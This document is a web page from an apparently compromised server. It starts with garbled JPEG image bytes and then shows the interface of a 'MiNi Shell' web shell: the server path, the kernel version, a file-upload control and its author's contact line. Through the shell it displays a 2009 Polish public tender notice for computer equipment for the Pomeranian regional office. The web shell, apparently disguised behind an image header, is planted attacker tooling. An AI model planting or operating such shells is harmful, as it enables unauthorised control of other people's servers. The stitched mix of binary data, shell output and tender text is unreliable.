JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20091015/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20091015/179107-N-2009.html

<p class="kh_header"><b>Gdańsk: Dostawa sprzętu komputerowego i oprogramowania dla Urzędu Marszałkowskiego Województwa Pomorskiego w Gdańsku.</b><br>
<b>Numer ogłoszenia: 179107 - 2009; data zamieszczenia: 15.10.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samorząd Województwa Pomorskiego , ul. Okopowa 21/27, 80-810 Gdańsk, woj. pomorskie, tel. 058 3261555, faks 058 3261556.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.woj-pomorskie.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa sprzętu komputerowego i oprogramowania dla Urzędu Marszałkowskiego Województwa Pomorskiego w Gdańsku..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest dostawa i uruchomienie fabrycznie nowego sprzętu komputerowego i oprogramowania wymienionych i opisanych w załączniku nr 2 do SIWZ. 

2.Przedmiot zamówienia obejmuje wykonanie następujących zadań:
1)	Zadanie 1 (poz. nr 1,2,3,4 załącznika nr 2 do SIWZ) obejmuje dostawę:
-zestawów komputerowych typ 1 - jednostka centralna z monitorem 19 LCD - 51 sztuk,
-zestawów komputerowych typ 2 - jednostka centralna z monitorem 21 LCD - 3 sztuki,
-notebooków typ 1 z LCD 13,3 - 7 sztuk,
-notebooków typ 2 z LCD 15,4- 21 sztuk.
na zasadach określonych we wzorze umowy stanowiącym załącznik nr 5a do SIWZ.
2)	Zadanie 2 (poz. nr 5,6,7,8,9,10,11,12,13,14,15,16,17 załącznika nr 2 do SIWZ) obejmuje dostawę:
-drukarek laserowych kolorowych A4 z wbudowaną kartą sieciową i modułem dupleksu - 7 sztuk,
-drukarek laserowych monochromatycznych A4 z wbudowaną kartą sieciową i modułem dupleksu - 9 sztuk,
-urządzeń wielofunkcyjnych laserowych monochromatycznych A4 (drukarka/skaner/ksero) z wbudowaną kartą sieciową i modułem dupleksu - 2 sztuki,
-drukarki atramentowej kolorowej A4 przenośnej do notebooka z baterią - 1 sztuka,
-projektorów multimedialnych - 5 sztuk,
-ekranów do projektorów multimedialnych - 5 sztuk,
-pamięci przenośnej flash 4GB (pendrive) - 32 sztuk,
-dodatkowego zasobnika papieru do drukarki OKI C9650 HDN (kod: 42831303) - 1 sztuka,
-skanerów przenośny, rolkowych, kolorowych - 4 sztuk,
-programu do tworzenia animacji z wykorzystaniem grafiki wektorowej -  1 sztuka,
-programu do edycji grafiki wektorowej -  2 sztuk,
-programu do obsługi publikacji elektronicznych - 1 sztuka,
-programu do tworzenia, przetwarzania i publikowania raportów biznesowych -  1 sztuka,
				na zasadach określonych we wzorze umowy stanowiącym załącznik nr 5b do SIWZ.
3.Określone w załączniku nr 2 do SIWZ parametry techniczne stanowią minimalne wymagania Zamawiającego, jakie musi spełniać dostarczony przez Wykonawcę sprzęt i oprogramowanie.
4.Wykonawca dostarczy w/w sprzęt z oprogramowaniem, własnym transportem, do wskazanych pomieszczeń w siedzibie zamawiającego przy ul.Okopowej 21/27 oraz przy ul.Augustyńskiego 2 w Gdańsku. 
5.Wraz z dostawą przedmiotu zamówienia Wykonawca dostarczy dokumenty potwierdzające wymagania jakościowe dotyczące przedmiotu zamówienia, zgodnie z wymaganiami określonymi w §2 załącznika nr 5a i 5b do SIWZ - Wzory umów.
6.Wykonawca zainstaluje i uruchomi dostarczony sprzęt w siedzibie  Zamawiającego, a następnie dokona wstępnego szkolenia użytkowników. 
7.Wszystkie komputery i notebooki muszą być dostarczone z zainstalowanym systemem, nie wymagającym aktywacji za pomocą telefonu lub Internetu w firmie Microsoft Corp. Numer Produkt Key na etykiecie Certyfikatu autentyczności (COA) na komputerze musi być ten sam, co numer Produkt Key systemu zainstalowanego w komputerze.
8.Dostawa i uruchomienie sprzętu komputerowego stanowiącego przedmiot zamówienia zostaną potwierdzone protokołem zdawczo-odbiorczym. Podpisany przez obie strony zamówienia protokół zdawczo-odbiorczy będzie stanowił podstawę do wystawienia faktury przez Wykonawcę. 
9.Termin realizacji zamówienia: 21 dni kalendarzowych od daty podpisania umowy.
10.Wykonawca wraz z dostawą dostarczy pisemne gwarancje jakości na przedmiot zamówienia udzielone przez producenta sprzętu. Wymagany okres gwarancji:
1)	dla Zadania 1
a.	dla pozycji 1, 2, 3, 4 wymienionych w załączniku nr 2 do SIWZ - minimum 3 lata,
2)	dla Zadania 2
a.	dla pozycji 5, 6, 7, 9 wymienionych w załączniku nr 2 do SIWZ - minimum 2 lata,
b.	dla pozycji 8, 10, 11, 12, 13 wymienionej w załączniku nr 2 do SIWZ - minimum 1 rok,
c.	dla pozycji 14, 15, 16, 17 wymienionych w załączniku nr 2 do SIWZ - zgodnie z warunkami licencji udzielonymi przez producenta oprogramowania. Wykonawca udzieli 3-miesięcznej gwarancji na jakość nośników. W ramach gwarancji wykonawca zobowiązuje się do wymiany nośników wykazujących wady fizyczne, na nowe, wolne od wad, w czasie nie dłuższym niż 14 dni od momentu otrzymania zgłoszenia od Zamawiającego.
11.Zamawiający wymaga, aby naprawy gwarancyjne były realizowane przez autoryzowany serwis producenta sprzętu w siedzibie Zamawiającego (serwis on-site)..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 30.21.30.00-5, 30.21.31.00-6, 30.23.21.10-8, 30.23.21.50-0, 30.23.45.00-3, 38.65.21.00-1, 38.65.34.00-1, 48.32.20.00-1, 48.52.00.00-9, 48.46.30.00-1, 30.21.61.10-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 21.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.	Wymagania podmiotowe:
 1)  W przetargu mogą wziąć udział Wykonawcy, którzy:
a)  spełniają warunki określone w art.22  ust.1 ustawy, w szczególności:
- wykonali w okresie ostatnich trzech lat, przed dniem wszczęcia postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, dostawę (lub co najmniej dwie dostawy) sprzętu odpowiadającą swoim rodzajem dostawom stanowiącym przedmiot zamówienia, o wartości łącznej dostaw nie mniejszej niż 400.000 złotych brutto.
b) nie podlegają wykluczeniu z postępowania na mocy art.24 ust.1 i 2 ustawy. 
2.	Wymagania przedmiotowe:
1)	Producent sprzętu określonego w pozycjach nr 1,2,3,4 załącznika nr 2 do SIWZ, posiada certyfikat ISO 9001:2000 oraz ISO 14001 lub równoważne.
2)	Serwis który będzie świadczył usługi gwarancyjne sprzętu określonego w pozycjach nr 1,2,3,4 załącznika nr 2 do SIWZ posiada certyfikat ISO 9001:2000 lub równoważny.
3)	Oferowane zestawy komputerowe (jednostki centralne bez napędów nośników danych), określone w pozycjach nr 1, 2 załącznika nr 2 do SIWZ nie przekraczają poziomu głośności (ciśnienia akustycznego) o wartości 27 dB (LpAm) mierzonego zgodnie z normą PN-ISO 9296 lub z inną równoważną normą.
4)	Dostarczane komputery, urządzenia i elementy komputerów muszą spełniać wymagania dotyczące oceny zgodności wynikające z ustawy z dnia 15 grudnia 2006 roku o zmianie ustawy o systemie zgodności oraz o zmianie niektórych innych ustaw (Dz.U. z 29.12.2006r. Nr 249, poz. 1834).
3.	Ocena spełniania warunków udziału w postępowaniu nastąpi na podstawie dokumentów przedłożonych przez Wykonawcę w ofercie, wyszczególnionych w §5, na zasadzie kwalifikacji spełnia nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.	Wykonawca składa wraz z ofertą następujące dokumenty potwierdzające spełnianie warunków udziału w postępowaniu:
1)	oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu - wg wzoru na załączniku nr 3 do SIWZ,
2)	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
3)	wykaz wykonanych dostaw w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem dostawom stanowiącym przedmiot zamówienia, o wartości łącznej nie mniejszej niż 400.000 złotych brutto, z podaniem ich wartości, przedmiotu, daty wykonania i odbiorców wraz z dokumentami potwierdzającymi, że dostawy te zostały wykonane należycie - wg wzoru na załączniku nr 4 do SIWZ.
2.	Wykonawcy składają wraz z ofertą następujące dokumenty potwierdzające spełnianie przez  
    oferowane dostawy i usługi wymagań określonych przez Zamawiającego: 
1)	Kopie certyfikatów ISO 9001:2000 oraz ISO 14001 (lub równoważnych) dla producenta
	sprzętu określonego w pozycjach nr 1,2,3,4 załącznika nr 2 do SIWZ.
2)	Kopie certyfikatu ISO 9001:2000 (lub równoważnego) dla serwisu który będzie świadczył usługi gwarancyjne sprzętu określonego w pozycjach nr 1,2,3,4 załącznika nr 2 do SIWZ.
3)	Kopię oświadczenia producenta sprzętu określonego w pozycjach nr 1, 2 załącznika nr 2 do SIWZ potwierdzające, że oferowane zestawy komputerowe (jednostki centralne bez napędów nośników danych) nie przekraczają poziomu głośności (ciśnienia akustycznego) o wartości 27 dB (LpAm) mierzonego zgodnie z normą PN-ISO 9296 lub z inną równoważną normą.
4)	Oświadczenie wykonawcy, że oferowany sprzęt spełnia wymagania dotyczące oceny zgodności, zgodnie z §3 ust.2 pkt.4 SIWZ.
3.	W przypadku Wykonawców występujących wspólnie dokumenty wymienione w §5 ust.1 pkt.2, składa każdy z podmiotów tworzących konsorcjum. Dokument wymieniony w §5 ust.1 pkt.3 składa pełnomocnik, przy czym warunek określony w §3 ust.1 pkt.1 lit.a może być spełniony łącznie przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia. Oświadczenie, o którym mowa w ust.1 pkt.1 powyżej, składa każdy z Wykonawców w zakresie, który go dotyczy.
4.	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w ust.1 pkt.2 i pkt.3 składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a)	nie otwarto jego likwidacji ani nie ogłoszono upadłości;
b)	nie zalega z uiszczaniem podatków, opłat lub składek na ubezpieczenie społeczne lub   zdrowotne albo, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu.
5.	Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w ust.4, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania.
6.	Dokument, o którym mowa w ust.4 pkt.a musi być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Dokument, o którym mowa w ust.4 pkt.b, musi być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://www.wrotapomorza.pl/pl/bip/umwp/zamowienia/zamowienia.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Marszałkowski Województwa Pomorskiego
ul. Okopowa 21/27
80-810 Gdańsk
pok. 8A.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.10.2009 godzina 09:00, miejsce: Urząd Marszałkowski Województwa Pomorskiego
ul. Okopowa 21/27
80-810 Gdańsk
pok. 4.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Regionalny Program Operacyjny dla Województwa Pomorskiego na lata 2007 - 2013, Europejski Fundusz Społeczny, Program Rozwoju Obszarów Wiejskich na lata 2007 - 2013.</p><p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa sprzętu komputerowego i oprogramowania dla Urzędu Marszałkowskiego Województwa Pomorskiego w Gdańsku.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1)	Zadanie 1 (poz. nr 1,2,3,4 załącznika nr 2 do SIWZ) obejmuje dostawę:
-zestawów komputerowych typ 1 - jednostka centralna z monitorem 19 LCD - 51 sztuk,
-zestawów komputerowych typ 2 - jednostka centralna z monitorem 21 LCD - 3 sztuki,
-notebooków typ 1 z LCD 13,3 - 7 sztuk,
-notebooków typ 2 z LCD 15,4- 21 sztuk.
na zasadach określonych we wzorze umowy stanowiącym załącznik nr 5a do SIWZ..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.21.30.00-5, 30.21.31.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa sprzętu komputerowego i oprogramowania dla Urzędu Marszałkowskiego Województwa Pomorskiego w Gdańsku..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 2)	Zadanie 2 (poz. nr 5,6,7,8,9,10,11,12,13,14,15,16,17 załącznika nr 2 do SIWZ) obejmuje dostawę:
-drukarek laserowych kolorowych A4 z wbudowaną kartą sieciową i modułem dupleksu - 7 sztuk,
-drukarek laserowych monochromatycznych A4 z wbudowaną kartą sieciową i modułem dupleksu - 9 sztuk,
-urządzeń wielofunkcyjnych laserowych monochromatycznych A4 (drukarka/skaner/ksero) z wbudowaną kartą sieciową i modułem dupleksu - 2 sztuki,
-drukarki atramentowej kolorowej A4 przenośnej do notebooka z baterią - 1 sztuka,
-projektorów multimedialnych - 5 sztuk,
-ekranów do projektorów multimedialnych - 5 sztuk,
-pamięci przenośnej flash 4GB (pendrive) - 32 sztuk,
-dodatkowego zasobnika papieru do drukarki OKI C9650 HDN (kod: 42831303) - 1 sztuka,
-skanerów przenośny, rolkowych, kolorowych - 4 sztuk,
-programu do tworzenia animacji z wykorzystaniem grafiki wektorowej -  1 sztuka,
-programu do edycji grafiki wektorowej -  2 sztuk,
-programu do obsługi publikacji elektronicznych - 1 sztuka,
-programu do tworzenia, przetwarzania i publikowania raportów biznesowych -  1 sztuka,
na zasadach określonych we wzorze umowy stanowiącym załącznik nr 5b do SIWZ..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.23.21.10-8, 30.23.21.50-0, 30.23.45.00-3, 38.65.21.00-1, 38.65.34.00-1, 48.32.20.00-1, 48.52.00.00-9, 48.46.30.00-1, 30.21.61.10-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com